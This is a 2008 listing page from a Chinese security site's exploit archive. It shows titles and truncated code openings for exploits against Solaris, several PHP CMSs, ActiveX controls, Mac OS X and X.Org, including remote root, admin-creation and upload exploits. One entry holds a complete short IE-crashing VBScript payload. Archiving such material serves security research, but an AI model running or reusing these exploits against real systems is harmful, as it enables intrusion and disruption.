首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Solaris 8/9/10 fifofs I_PEEK Local Kernel memory Leak Exploit
  日期:2008-03-11 14:58:55 点击:48 评论:0
/* * $Id: raptor_peek.c,v 1.1 2007/10/18 08:09:02 raptor Exp $ * * raptor_peek.c - Solaris fifofs I_PEEK kernel memory leak * Copyright (c) 2007 Marco Ivaldi raptor@0xdeadbeef.info * * [Lame] integer signedness error in FIFO filesystems (named pipes)
KingSoft UpdateOcx2.dll SetUninstallName() Heap Overflow PoC
  日期:2008-03-11 14:57:44 点击:55 评论:0
!-- KingSoft UpdateOcx2.dll SetUninstallName() Heap Overflow Exploit Date: 2008-02-29 MSN: void[at]ph4nt0m[dot]org http://www.ph4nt0m.org 文件路径: C:WINDOWSsystem32KingSoftKOSUpdateOcx2.dll 文件描述: Kingsoft Antivirus Online Update Module 文
VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
  日期:2008-03-10 12:26:40 点击:156 评论:0
#!/usr/bin/php -q ?php error_reporting(E_ALL ^ E_NOTICE); # # # darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/ # # VHCS = 2.4.7.1 (vhcs2_daemon) Remote Root Exploit # -------------------------------------------------- # # About: # by
zKup CMS 2.0 <= 2.3 Remote Upload Exploit
  日期:2008-03-10 12:26:13 点击:42 评论:0
#!/usr/bin/php ?php /* * Name: zKup CMS v2.0 = v2.3 0-day exploit (upload) * Credits: Charles real F. charlesfol[at]hotmail.fr * Date: 03-08-2008 * Conditions: PHP Version, magic_quotes_gpc=Off * * This exploit spawn a php uploader in your victim's *
zKup CMS 2.0 <= 2.3 Remote Add Admin Exploit
  日期:2008-03-10 12:23:59 点击:30 评论:0
#!/usr/bin/php ?php /* * Name: zKup CMS v2.0 = v2.3 0-day exploit (add admin) * Credits: Charles real F. charlesfol[at]hotmail.fr * Date: 03-08-2008 * Conditions: None. * * This exploit add a new zKup admin. * */ print n; print zKup CMS v2.0 = v2.3
ICQ Toolbar 2.3 ActiveX Remote Denial of Service Exploit
  日期:2008-03-07 13:22:25 点击:31 评论:0
!-- Lame ICQToolbar IE DoS - Crash IE and change toolbar color :p -- html object classid='clsid:855F3B16-6D32-4FE6-8A56-BBB695989046' id='toolbar' /object script language='vbscript' bof=String(128, spdr) toolbar.GetPropertyById ,bof /script /html
MiniWebSvr 0.0.9a Remote Directory Transversal Vulnerability
  日期:2008-03-05 13:39:07 点击:42 评论:0
import socket import sys print '---------------------------------------------------------' print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability' print 'Project URL: http://miniwebsvr.sourceforge.net/' print 'Author: gbr' print 'Tested on Wind
千千静听 med 文件格式堆溢出
  日期:2008-03-03 14:08:51 点击:52 评论:0
千千静听使用的是 libmod 来进行 mod 类文件格式的处理, 此库在 ReadMed 函数中,没有检查 文件描述的长度,如果传递一个恶意构造的值,将导致堆溢出。 现在采用libmod 软件很多,都应该存在此问题。 下面是构造问题文件的代码,最后是使用最新版本千千静听的 ax 写的 p
Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) DoS Exploit
  日期:2008-03-03 14:07:26 点击:53 评论:0
/* Discovered bY 0in From DaRk-CodeRs Programming Security Group! Contact: 0in(dot)email[at]gmail(dot)com HOMEPAGE: http://dark-coders.4rh.eu DESCRIPTION: Livebox router is vulnerability to remote (but from local network, because firewall working..)
Symantec BackupExec Calendar Control (PVCalendar.ocx) BoF Exploit
  日期:2008-03-03 14:05:39 点击:116 评论:0
!-- Symantec BackupExec Calendar Control(PVCalendar.ocx) BoF Exploit Vulnerability discovered by JJ Reyes of Secunia Research http://secunia.com/advisories/27885/ written by e.b. Tested on Windows XP SP2(fully patched) English, IE6 and IE7, PVCalenda
Centreon <= 1.4.2.3 (get_image.php) Remote File Disclosure Exploit
  日期:2008-02-29 12:11:43 点击:62 评论:0
#!/usr/bin/python # Date : 20/01/2008 # Author : Julien CAYSSOL julien@aqwz.com import sys, urllib2,re user_agent = 'Mozilla/6.0 (compatible; MSIE 6.0; Windows NT)' headers = { 'User-Agent' : user_agent , 'Accept-Charset' : 'ISO-8859-15' } if __name_
EazyPortal <= 1.0 (COOKIE) Remote SQL Injection Exploit
  日期:2008-02-28 12:03:22 点击:73 评论:0
#!/usr/bin/perl # #Vendor url: http://www.eazyportal.com/ # #by Iron - http://www.randombase.com # #exploit goes through $_COOKIE # use LWP::UserAgent; use MIME::Base64; print # # EazyPortal = 1.0 SQL Injection Exploit # By Iron - www.randombase.com
D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5) BOF Exploit
  日期:2008-02-27 11:49:07 点击:189 评论:0
!-- D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5) remote overflow exploit (Internet Explorer 7/XP SP2) check a live camera demonstration here with DCS-5300 camera series: http://www.dlink.com/products/liveDemo/ This vulnerability affects i
Nukedit 4.9.x Remote Create Admin Exploit
  日期:2008-02-27 11:46:48 点击:51 评论:0
#!/usr/bin/perl ########################################################### #Title: Nukedit 4.9.x Create Admin Exploit # # # #Credit: r3dm0v3 # # http://r3dm0v3.persianblog.ir # # r3dm0v3[4t]yahoo[dot]com # # Tehran - Iran # # # #Download: http://ww
Apple Mac OS X xnu <= 1228.3.13 ipv6-ipcomp Remote kernel DoS PoC
  日期:2008-02-27 11:45:44 点击:112 评论:0
/* xnu-ipv6-ipcomp.c * * Copyright (c) 2008 by mu-b@digit-labs.org * * Apple MACOS X xnu = 1228.3.13 ipv6-ipcomp remote kernel DoS POC * by mu-b - Sun 24 Feb 2008 * * - Tested on: Apple MACOS X 10.5.1 (xnu-1228.0.2~1/RELEASE_I386) * Apple MACOS X 10.
Move Networks Quantum Streaming Player Control BOF Exploit
  日期:2008-02-27 11:44:27 点击:39 评论:0
!-- Move Networks Quantum Streaming Player Control UploadLogs() Buffer Overflow Exploit written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, qsp2ie07074039.dll version 7.7.4.39(digitally signed Tuesday, September 18, 2007 7:10:35PM)
DBHcms <= 1.1.4 Remote File Inclusion exploit
  日期:2008-02-26 18:04:07 点击:56 评论:0
#!/usr/bin/perl #DBHcms = 1.1.4 Remote File Inclusion exploit #Vendor url: www.drbenhur.com # # exploit is hard to execute through a browser -possible though- since it's with POST #~Iron #http://www.randombase.com require LWP::UserAgent; #Shell: # ?p
Rising Antivirus Online Scanner Insecure Method Flaw Exploit
  日期:2008-02-26 17:59:50 点击:54 评论:0
!-- - Rising is a popular anti-virus product around China. - there's an insecure method flaw inside its free online scanner. - it's quite easy to exploit the bug which leads to a remote execution. - visit http://online.rising.com.cn/free/index.htm to
MyServer 0.8.11 (204 No Content) error Remote Denial of Service Exploit
  日期:2008-02-26 11:39:32 点击:38 评论:0
#exploit.py import socket import os print '------------------------------------------------------------------' print ' MyServer 0.8.11 204 No Content error Remote Denial of Service' print ' url: www.myserverproject.net' print ' author: shinnai' print
X.Org xorg-x11-xfs <= 1.0.2-3.1 Local Race Condition Exploit
  日期:2008-02-22 12:11:12 点击:73 评论:0
#!/bin/sh # Xorg-x11-xfs Race Condition Vuln local root exploit (CVE-2007-3103) # # Another lame xploit by vl4dZ :)) works on redhat el5 and before # # $ id # uid=1001(kecos) gid=1001(user) groups=1001(user) # $ sh xfs-RaceCondition-root-exploit.sh #
共637页/12733条记录 首页 上一页 [527] [528] [529] 530 [531] [532] [533] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved